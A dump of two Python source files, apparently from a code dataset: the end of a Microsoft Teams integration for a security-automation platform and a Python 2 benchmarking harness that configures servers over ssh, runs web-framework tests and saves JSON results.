demisto.error(f'An error occurred in long running loop: {error_message} - {format_exc()}')
demisto.updateModuleHealth(f'An error occurred: {error_message}')
finally:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
if server:
server.stop()
time.sleep(5)
def test_module():
"""
Tests token retrieval for Bot Framework API
"""
get_bot_access_token()
demisto.results('ok')
def main():
""" COMMANDS MANAGER / SWITCH PANEL """
commands: dict = {
'test-module': test_module,
'long-running-execution': long_running_loop,
'send-notification': send_message,
'mirror-investigation': mirror_investigation,
'close-channel': close_channel,
'microsoft-teams-integration-health': integration_health,
'create-channel': create_channel_command,
'add-user-to-channel': add_user_to_channel_command,
# 'microsoft-teams-create-team': create_team,
# 'microsoft-teams-send-file': send_file,
'microsoft-teams-ring-user': ring_user,
'microsoft-teams-create-channel': create_channel_command,
'microsoft-teams-add-user-to-channel': add_user_to_channel_command,
'microsoft-teams-create-meeting': create_meeting_command,
}
''' EXECUTION '''
try:
handle_proxy()
command: str = demisto.command()
LOG(f'Command being called is {command}')
if command in commands.keys():
commands[command]()
# Log exceptions
except Exception as e:
return_error(f'{str(e)} - {format_exc()}')
if __name__ == 'builtins':
main()
|
benchmarker.py
|
from setup.linux.installer import Installer
from benchmark import framework_test
import os
import json
import subprocess
import time
import textwrap
import pprint
import csv
import sys
import logging
import socket
import glob
from multiprocessing import Process
from datetime import datetime
class Benchmarker:
##########################################################################################
# Public methods
##########################################################################################
############################################################
# Prints all the available tests
############################################################
def run_list_tests(self):
all_tests = self.__gather_tests
for test in all_tests:
print test.name
self.__finish()
############################################################
# End run_list_tests
############################################################
############################################################
# Prints the metadata for all the available tests
############################################################
def run_list_test_metadata(self):
all_tests = self.__gather_tests
all_tests_json = json.dumps(map(lambda test: {
"name": test.name,
"approach": test.approach,
"classification": test.classification,
"database": test.database,
"framework": test.framework,
"language": test.language,
"orm": test.orm,
"platform": test.platform,
"webserver": test.webserver,
"os": test.os,
"database_os": test.database_os,
"display_name": test.display_name,
"notes": test.notes,
"versus": test.versus
}, all_tests))
with open(os.path.join(self.full_results_directory(), "test_metadata.json"), "w") as f:
f.write(all_tests_json)
self.__finish()
############################################################
# End run_list_test_metadata
############################################################
############################################################
# parse_timestamp
# Re-parses the raw data for a given timestamp
############################################################
def parse_timestamp(self):
all_tests = self.__gather_tests
for test in all_tests:
test.parse_all()
self.__parse_results(all_tests)
self.__finish()
############################################################
# End parse_timestamp
############################################################
############################################################
# Run the tests:
# This process involves setting up the client/server machines
# with any necessary change. Then going through each test,
# running their setup script, verifying the URLs, and
# running benchmarks against them.
############################################################
def run(self):
##########################
# Get a list of all known
# tests that we can run.
##########################
all_tests = self.__gather_tests
##########################
# Setup client/server
##########################
print textwrap.dedent("""
=====================================================
Preparing Server, Database, and Client ...
=====================================================
""")
self.__setup_server()
self.__setup_database()
self.__setup_client()
## Check if wrk (and wrk-pipeline) is installed and executable, if not, raise an exception
#if not (os.access("/usr/local/bin/wrk", os.X_OK) and os.access("/usr/local/bin/wrk-pipeline", os.X_OK)):
# raise Exception("wrk and/or wrk-pipeline are not properly installed. Not running tests.")
##########################
# Run tests
##########################
print textwrap.dedent("""
=====================================================
Running Tests ...
=====================================================
""")
self.__run_tests(all_tests)
##########################
# Parse results
##########################
if self.mode == "benchmark":
print textwrap.dedent("""
=====================================================
Parsing Results ...
=====================================================
""")
self.__parse_results(all_tests)
self.__finish()
############################################################
# End run
############################################################
############################################################
# database_sftp_string(batch_file)
# generates a fully qualified URL for sftp to database
############################################################
def database_sftp_string(self, batch_file):
sftp_string = "sftp -oStrictHostKeyChecking=no "
if batch_file != None: sftp_string += " -b " + batch_file + " "
if self.database_identity_file != None:
sftp_string += " -i " + self.database_identity_file + " "
return sftp_string + self.database_user + "@" + self.database_host
############################################################
# End database_sftp_string
############################################################
############################################################
# client_sftp_string(batch_file)
# generates a fully qualified URL for sftp to client
############################################################
def client_sftp_string(self, batch_file):
sftp_string = "sftp -oStrictHostKeyChecking=no "
if batch_file != None: sftp_string += " -b " + batch_file + " "
if self.client_identity_file != None:
sftp_string += " -i " + self.client_identity_file + " "
return sftp_string + self.client_user + "@" + self.client_host
############################################################
# End client_sftp_string
############################################################
############################################################
# generate_url(url, port)
# generates a fully qualified URL for accessing a test url
############################################################
def generate_url(self, url, port):
return self.server_host + ":" + str(port) + url
############################################################
# End generate_url
############################################################
############################################################
# get_output_file(test_name, test_type)
# returns the output file name for this test_name and
# test_type timestamp/test_type/test_name/raw
############################################################
def get_output_file(self, test_name, test_type):
return os.path.join(self.result_directory, self.timestamp, test_type, test_name, "raw")
############################################################
# End get_output_file
############################################################
############################################################
# output_file(test_name, test_type)
# returns the output file for this test_name and test_type
# timestamp/test_type/test_name/raw
############################################################
def output_file(self, test_name, test_type):
path = self.get_output_file(test_name, test_type)
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
############################################################
# End output_file
############################################################
############################################################
# get_warning_file(test_name, test_type)
# returns the output file name for this test_name and
# test_type timestamp/test_type/test_name/raw
############################################################
def get_warning_file(self, test_name, test_type):
return os.path.join(self.result_directory, self.timestamp, test_type, test_name, "warn")
############################################################
# End get_warning_file
############################################################
############################################################
# warning_file(test_name, test_type)
# returns the warning file for this test_name and test_type
# timestamp/test_type/test_name/raw
############################################################
def warning_file(self, test_name, test_type):
path = self.get_warning_file(test_name, test_type)
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
############################################################
# End warning_file
############################################################
############################################################
# full_results_directory
############################################################
def full_results_directory(self):
path = os.path.join(self.result_directory, self.timestamp)
try:
os.makedirs(path)
except OSError:
pass
return path
############################################################
# End full_results_directory
############################################################
############################################################
# Latest intermediate results dirctory
############################################################
def latest_results_directory(self):
path = os.path.join(self.result_directory,"latest")
try:
os.makedirs(path)
except OSError:
pass
return path
############################################################
# report_results
############################################################
def report_results(self, framework, test, results):
if test not in self.results['rawData'].keys():
self.results['rawData'][test] = dict()
# If results has a size from the parse, then it succeeded.
if results:
self.results['rawData'][test][framework.name] = results
# This may already be set for single-tests
if framework.name not in self.results['succeeded'][test]:
self.results['succeeded'][test].append(framework.name)
# Add this type
if (os.path.exists(self.get_warning_file(framework.name, test)) and
framework.name not in self.results['warning'][test]):
self.results['warning'][test].append(framework.name)
else:
# This may already be set for single-tests
if framework.name not in self.results['failed'][test]:
self.results['failed'][test].append(framework.name)
############################################################
# End report_results
############################################################
##########################################################################################
# Private methods
##########################################################################################
############################################################
# Gathers all the tests
############################################################
@property
def __gather_tests(self):
tests = []
# Assume we are running from FrameworkBenchmarks
config_files = glob.glob('*/benchmark_config')
for config_file_name in config_files:
# Look for the benchmark_config file, this will set up our tests.
# Its format looks like this:
#
# {
# "framework": "nodejs",
# "tests": [{
# "default": {
# "setup_file": "setup",
# "json_url": "/json"
# },
# "mysql": {
# "setup_file": "setup",
# "db_url": "/mysql",
# "query_url": "/mysql?queries="
# },
# ...
# }]
# }
config = None
with open(config_file_name, 'r') as config_file:
# Load json file into config object
try:
config = json.load(config_file)
except:
print("Error loading '%s'." % config_file_name)
raise
if config is None:
continue
test = framework_test.parse_config(config, os.path.dirname(config_file_name), self)
# If the user specified which tests to run, then
# we can skip over tests that are not in that list
if self.test == None:
tests = tests + test
else:
for atest in test:
if atest.name in self.test:
tests.append(atest)
tests.sort(key=lambda x: x.name)
return tests
############################################################
# End __gather_tests
############################################################
############################################################
# Gathers all the frameworks
############################################################
def __gather_frameworks(self):
frameworks = []
# Loop through each directory (we assume we're being run from the benchmarking root)
for dirname, dirnames, filenames in os.walk('.'):
# Look for the benchmark_config file, this will contain our framework name
# It's format looks like this:
#
# {
# "framework": "nodejs",
# "tests": [{
# "default": {
# "setup_file": "setup",
# "json_url": "/json"
# },
# "mysql": {
# "setup_file": "setup",
# "db_url": "/mysql",
# "query_url": "/mysql?queries="
# },
# ...
# }]
# }
if 'benchmark_config' in filenames:
config = None
with open(os.path.join(dirname, 'benchmark_config'), 'r') as config_file:
# Load json file into config object
config = json.load(config_file)
if config == None:
continue
frameworks.append(str(config['framework']))
return frameworks
############################################################
# End __gather_frameworks
############################################################
############################################################
# Makes any necessary changes to the server that should be
# made before running the tests. This involves setting kernal
# settings to allow for more connections, or more file
# descriptiors
#
# http://redmine.lighttpd.net/projects/weighttp/wiki#Troubleshooting
############################################################
def __setup_server(self):
try:
if os.name == 'nt':
return True
subprocess.check_call(["sudo","bash","-c","cd /sys/devices/system/cpu; ls -d cpu[0-9]*|while read x; do echo performance > $x/cpufreq/scaling_governor; done"])
subprocess.check_call("sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535".rsplit(" "))
subprocess.check_call("sudo sysctl -w net.core.somaxconn=65535".rsplit(" "))
subprocess.check_call("sudo -s ulimit -n 65535".rsplit(" "))
subprocess.check_call("sudo sysctl net.ipv4.tcp_tw_reuse=1".rsplit(" "))
subprocess.check_call("sudo sysctl net.ipv4.tcp_tw_recycle=1".rsplit(" "))
subprocess.check_call("sudo sysctl -w kernel.shmmax=134217728".rsplit(" "))
subprocess.check_call("sudo sysctl -w kernel.shmall=2097152".rsplit(" "))
except subprocess.CalledProcessError:
return False
############################################################
# End __setup_server
############################################################
############################################################
# Makes any necessary changes to the database machine that
# should be made before running the tests. Is very similar
# to the server setup, but may also include database specific
# changes.
############################################################
def __setup_database(self):
p = subprocess.Popen(self.database_ssh_string, stdin=subprocess.PIPE, shell=True)
p.communicate("""
sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535
sudo sysctl -w net.core.somaxconn=65535
sudo -s ulimit -n 65535
sudo sysctl net.ipv4.tcp_tw_reuse=1
sudo sysctl net.ipv4.tcp_tw_recycle=1
sudo sysctl -w kernel.shmmax=2147483648
sudo sysctl -w kernel.shmall=2097152
""")
############################################################
# End __setup_database
############################################################
############################################################
# Makes any necessary changes to the client machine that
# should be made before running the tests. Is very similar
# to the server setup, but may also include client specific
# changes.
############################################################
def __setup_client(self):
p = subprocess.Popen(self.client_ssh_string, stdin=subprocess.PIPE, shell=True)
p.communicate("""
sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535
sudo sysctl -w net.core.somaxconn=65535
sudo -s ulimit -n 65535
sudo sysctl net.ipv4.tcp_tw_reuse=1
sudo sysctl net.ipv4.tcp_tw_recycle=1
sudo sysctl -w kernel.shmmax=2147483648
sudo sysctl -w kernel.shmall=2097152
""")
############################################################
# End __setup_client
############################################################
############################################################
# __run_tests
#
# 2013-10-02 ASB Calls each test passed in tests to
# __run_test in a separate process. Each
# test is given a set amount of time and if
# kills the child process (and subsequently
# all of its child processes). Uses
# multiprocessing module.
############################################################
def __run_tests(self, tests):
logging.debug("Start __run_tests.")
logging.debug("__name__ = %s",__name__)
if self.os.lower() == 'windows':
logging.debug("Executing __run_tests on Windows")
for test in tests:
self.__run_test(test)
else:
logging.debug("Executing __run_tests on Linux")
# These features do not work on Windows
for test in tests:
if __name__ == 'benchmark.benchmarker':
print textwrap.dedent("""
-----------------------------------------------------
Running Test: {name} ...
-----------------------------------------------------
""".format(name=test.name))
test_process = Process(target=self.__run_test, args=(test,))
test_process.start()
test_process.join(self.run_test_timeout_seconds)
if(test_process.is_alive()):
logging.debug("Child process for {name} is still alive. Terminating.".format(name=test.name))
self.__write_intermediate_results(test.name,"__run_test timeout (="+ str(self.run_test_timeout_seconds) + " seconds)")
test_process.terminate()
logging.debug("End __run_tests.")
############################################################
# End __run_tests
############################################################
############################################################
# __run_test
# 2013-10-02 ASB Previously __run_tests. This code now only
# processes a single test.
#
# Ensures that the system has all necessary software to run
# the tests. This does not include that software for the individual
# test, but covers software such as curl and weighttp that
# are needed.
############################################################
def __run_test(self, test):
try:
os.makedirs(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name)))
except:
pass
with open(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name), 'out.txt'), 'w') as out, \
open(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name), 'err.txt'), 'w') as err:
if hasattr(test, 'skip'):
if test.skip.lower() == "true":
out.write("Test {name} benchmark_config specifies to skip this test. Skipping.\n".format(name=test.name))
return
if test.os.lower() != self.os.lower() or test.database_os.lower() != self.database_os.lower():
# the operating system requirements of this test for the
# application server or the database server don't match
# our current environment
out.write("OS or Database OS specified in benchmark_config does not match the current environment. Skipping.\n")
return
# If the test is in the excludes list, we skip it
if self.exclude != None and test.name in self.exclude:
out.write("Test {name} has been added to the excludes list. Skipping.\n".format(name=test.name))
return
# If the test does not contain an implementation of the current test-type, skip it
if self.type != 'all' and not test.contains_type(self.type):
out.write("Test type {type} does not contain an implementation of the current test-type. Skipping.\n".format(type=self.type))
return
out.write("test.os.lower() = {os} test.database_os.lower() = {dbos}\n".format(os=test.os.lower(),dbos=test.database_os.lower()))
out.write("self.results['frameworks'] != None: {val}\n".format(val=str(self.results['frameworks'] != None)))
out.write("test.name: {name}\n".format(name=str(test.name)))
out.write("self.results['completed']: {completed}\n".format(completed=str(self.results['completed'])))
if self.results['frameworks'] != None and test.name in self.results['completed']:
out.write('Framework {name} found in latest saved data. Skipping.\n'.format(name=str(test.name)))
return
out.flush()
out.write( textwrap.dedent("""
=====================================================
Beginning {name}
-----------------------------------------------------
""".format(name=test.name)) )
out.flush()
##########################
# Start this test
##########################
out.write( textwrap.dedent("""
-----------------------------------------------------
Starting {name}
-----------------------------------------------------
""".format(name=test.name)) )
out.flush()
try:
if test.requires_database():
p = subprocess.Popen(self.database_ssh_string, stdin=subprocess.PIPE, stdout=out, stderr=err, shell=True)
p.communicate("""
sudo restart mysql
sudo restart mongodb
sudo /etc/init.d/postgresql restart
""")
time.sleep(10)
if self.__is_port_bound(test.port):
self.__write_intermediate_results(test.name, "port " + str(test.port) + " is not available before start")
err.write( textwrap.dedent("""
---------------------------------------------------------
Error: Port {port} is not available before start {name}
---------------------------------------------------------
""".format(name=test.name, port=str(test.port))) )
err.flush()
return
result = test.start(out, err)
if result != 0:
test.stop(out, err)
time.sleep(5)
err.write( "ERROR: Problem starting {name}\n".format(name=test.name) )
err.write( textwrap.dedent("""
-----------------------------------------------------
Stopped {name}
-----------------------------------------------------
""".format(name=test.name)) )
err.flush()
self.__write_intermediate_results(test.name,"<setup.py>#start() returned non-zero")
return
time.sleep(self.sleep)
##########################
# Verify URLs
##########################
test.verify_urls(out, err)
out.flush()
err.flush()
##########################
# Benchmark this test
##########################
if self.mode == "benchmark":
out.write( textwrap.dedent("""
-----------------------------------------------------
Benchmarking {name} ...
-----------------------------------------------------
""".format(name=test.name)) )
out.flush()
test.benchmark(out, err)
out.flush()
err.flush()
##########################
# Stop this test
##########################
out.write( textwrap.dedent("""
-----------------------------------------------------
Stopping {name}
-----------------------------------------------------
""".format(name=test.name)) )
out.flush()
test.stop(out, err)
out.flush()
err.flush()
time.sleep(5)
if self.__is_port_bound(test.port):
self.__write_intermediate_results(test.name, "port " + str(test.port) + " was not released by stop")
err.write( textwrap.dedent("""
-----------------------------------------------------
Error: Port {port} was not released by stop {name}
-----------------------------------------------------
""".format(name=test.name, port=str(test.port))) )
err.flush()
return
out.write( textwrap.dedent("""
-----------------------------------------------------
Stopped {name}
-----------------------------------------------------
""".format(name=test.name)) )
out.flush()
time.sleep(5)
##########################################################
# Save results thus far into toolset/benchmark/latest.json
##########################################################
out.write( textwrap.dedent("""
----------------------------------------------------
Saving results through {name}
----------------------------------------------------
""".format(name=test.name)) )
out.flush()
self.__write_intermediate_results(test.name,time.strftime("%Y%m%d%H%M%S", time.localtime()))
except (OSError, IOError, subprocess.CalledProcessError) as e:
self.__write_intermediate_results(test.name,"<setup.py> raised an exception")
err.write( textwrap.dedent("""
-----------------------------------------------------
Subprocess Error {name}
-----------------------------------------------------
{err}
{trace}
""".format(name=test.name, err=e, trace=sys.exc_info()[:2])) )
err.flush()
try:
test.stop(out, err)
except (subprocess.CalledProcessError) as e:
self.__write_intermediate_results(test.name,"<setup.py>#stop() raised an error")
err.write( textwrap.dedent("""
-----------------------------------------------------
Subprocess Error: Test .stop() raised exception {name}
-----------------------------------------------------
{err}
{trace}
""".format(name=test.name, err=e, trace=sys.exc_info()[:2])) )
err.flush()
except (KeyboardInterrupt, SystemExit) as e:
test.stop(out)
out.write( """
-----------------------------------------------------
Cleaning up....
-----------------------------------------------------
""")
out.flush()
self.__finish()
sys.exit()
out.close()
err.close()
############################################################
# End __run_tests
############################################################
############################################################
# __is_port_bound
# Check if the requested port is available. If it
# isn't available, then a previous test probably didn't
# shutdown properly.
############################################################
def __is_port_bound(self, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Try to bind to all IP addresses, this port
s.bind(("", port))
# If we get here, we were able to bind successfully,
# which means the port is free.
except:
# If we get an exception, it might be because the port is still bound
# which would be bad, or maybe it is a privileged port (<1024) and we
# are not running as root, or maybe the server is gone, but sockets are
# still in TIME_WAIT (SO_REUSEADDR). To determine which scenario, try to
# connect.
try:
s.connect(("127.0.0.1", port))
# If we get here, we were able to connect to something, which means
# that the port is still bound.
return True
except:
# An exception means that we couldn't connect, so a server probably
# isn't still running on the port.
pass
finally:
s.close()
return False
############################################################
# End __is_port_bound
############################################################
############################################################
# __parse_results
# Ensures that the system has all necessary software to run
# the tests. This does not include that software for the individual
# test, but covers software such as curl and weighttp that
# are needed.
############################################################
def __parse_results(self, tests):
# Run the method to get the commmit count of each framework.
self.__count_commits()
# Call the method which counts the sloc for each framework
self.__count_sloc()
# Time to create parsed files
# Aggregate JSON file
with open(os.path.join(self.full_results_directory(), "results.json"), "w") as f:
f.write(json.dumps(self.results))
############################################################
# End __parse_results
############################################################
#############################################################
# __count_sloc
# This is assumed to be run from the benchmark root directory
#############################################################
def __count_sloc(self):
all_frameworks = self.__gather_frameworks()
jsonResult = {}
for framework in all_frameworks:
try:
command = "cloc --list-file=" + framework['directory'] + "/source_code --yaml"
lineCount = subprocess.check_output(command, shell=True)
# Find the last instance of the word 'code' in the yaml output. This should
# be the line count for the sum of all listed files or just the line count
# for the last file in the case where there's only one file listed.
lineCount = lineCount[lineCount.rfind('code'):len(lineCount)]
lineCount = lineCount.strip('code: ')
lineCount = lineCount[0:lineCount.rfind('comment')]
jsonResult[framework['name']] = int(lineCount)
except:
continue
self.results['rawData']['slocCounts'] = jsonResult
############################################################
# End __count_sloc
############################################################
############################################################
# __count_commits
############################################################
def __count_commits(self):
all_frameworks = self.__gather_frameworks()
jsonResult = {}
for framework in all_frameworks:
try:
command = "git rev-list HEAD -- " + framework + " | sort -u | wc -l"
commitCount = subprocess.check_output(command, shell=True)
jsonResult[framework] = int(commitCount)
except:
continue
self.results['rawData']['commitCounts'] = jsonResult
self.commits = jsonResult
############################################################
# End __count_commits
############################################################
############################################################
# __write_intermediate_results
############################################################
def __write_intermediate_results(self,test_name,status_message):
try:
self.results["completed"][test_name] = status_message
with open(os.path.join(self.latest_results_directory, 'results.json'), 'w') as f:
f.write(json.dumps(self.results))
except (IOError):
logging.error("Error writing results.json")
############################################################
# End __write_intermediate_results
############################################################
############################################################
# __finish
############################################################
def __finish(self):
print "Time to complete: " + str(int(time.time() - self.start_time)) + " seconds"
print "Results are saved in " + os.path.join(self.result_directory, self.timestamp)
############################################################
# End __finish
############################################################
##########################################################################################
# Constructor
##########################################################################################
############################################################
# Initialize the benchmarker. The args are the arguments
# parsed via argparser.
############################################################
def __init__(self, args):
self.__dict__.update(args)
self.start_time = time.time()
self.run_test_timeout_seconds = 3600
# setup logging
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
# setup some additional variables
if self.database_user == None: self.database_user = self.client_user
if self.database_host == None: self.database_host = self.client_host
if self.database_identity_file == None: self.database_identity_file = self.client_identity_file
# setup results and latest_results directories
self.result_directory = os.path.join("results", self.name)
self.latest_results_directory = self.latest_results_directory()
if self.parse != None:
self.timestamp = self.parse
else:
self.timestamp = time.strftime("%Y%m%d%H%M%S", time.localtime())
# Setup the concurrency levels array. This array goes from
# starting_concurrency to max concurrency, doubling each time
self.concurrency_levels = []
concurrency = self.starting_concurrency
while concurrency <= self.max_concurrency:
self.concurrency_levels.append(concurrency)
concurrency = concurrency * 2
# Setup query interval array
# starts at 1, and goes up to max_queries, using the query_interval
self.query_intervals = []
queries = 1
while queries <= self.max_queries:
self.query_intervals.append(queries)
if queries == 1:
queries = 0
queries = queries + self.query_interval
# Load the latest data
#self.latest = None
#try:
# with open('toolset/benchmark/latest.json', 'r') as f:
# # Load json file into config object
# self.latest = json.load(f)
# logging.info("toolset/benchmark/latest.json loaded to self.latest")
# logging.debug("contents of latest.json: " + str(json.dumps(self.latest)))
#except IOError:
# logging.warn("IOError on attempting to read toolset/benchmark/latest.json")
#
#self.results = None
#try:
# if self.latest != None and self.name in self.latest.keys():
# with open(os.path.join(self.result_directory, str(self.latest[self.name]), 'results.json'), 'r') as f:
# # Load json file into config object
# self.results = json.load(f)
#except IOError:
# pass
self.results = None
try:
with open(os.path.join(self.latest_results_directory, 'results.json'), 'r') as f:
#Load json file into results object
self.results = json.load(f)
except IOError:
logging.warn("results.json for test %s not found.",self.name)
if self.results == None:
self.results = dict()
self.results['name'] = self.name
self.results['concurrencyLevels'] = self.concurrency_levels
self.results['queryIntervals'] = self.query_intervals
self.results['frameworks'] = [t.name for t in self.__gather_tests]
self.results['duration'] = self.duration
self.results['rawData'] = dict()
self.results['rawData']['json'] = dict()
self.results['rawData']['db'] = dict()
self.results['rawData']['query'] = dict()
self.results['rawData']['fortune'] = dict()
self.results['rawData']['update'] = dict()
self.results['rawData']['plaintext'] = dict()
self.results['completed'] = dict()
self.results['succeeded'] = dict()
self.results['succeeded']['json'] = []
self.results['succeeded']['db'] = []
self.results['succeeded']['query'] = []
self.results['succeeded']['fortune'] = []
self.results['succeeded']['update'] = []
self.results['succeeded']['plaintext'] = []
self.results['failed'] = dict()
self.results['failed']['json'] = []
self.results['failed']['db'] = []
self.results['failed']['query'] = []
self.results['failed']['fortune'] = []
self.results['failed']['update'] = []
self.results['failed']['plaintext'] = []
self.results['warning'] = dict()
self.results['warning']['json'] = []
self.results['warning']['db'] = []
self.results['warning']['query'] = []
self.results['warning']['fortune'] = []
self.results['warning']['update'] = []
self.results['warning']['plaintext'] = []
else:
#for x in self.__gather_tests():
# if x.name not in self.results['frameworks']:
# self.results['frameworks'] = self.results['frameworks'] + [x.name]
# Always overwrite framework list
self.results['frameworks'] = [t.name for t in self.__gather_tests]
# Setup the ssh command string
self.database_ssh_string = "ssh -T -o StrictHostKeyChecking=no " + self.database_user + "@" + self.database_host
self.client_ssh_string = "ssh -T -o StrictHostKeyChecking=no " + self.client_user + "@" + self.client_host
if self.database_identity_file != None:
self.database_ssh_string = self.database_ssh_string + " -i " + self.database_identity_file
if self.client_identity_file != None:
self.client_ssh_string = self.client_ssh_string + " -i " + self.client_identity_file
if self.install_software:
install = Installer(self)
install.install_software()
############################################################
# End __init__
############################################################
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.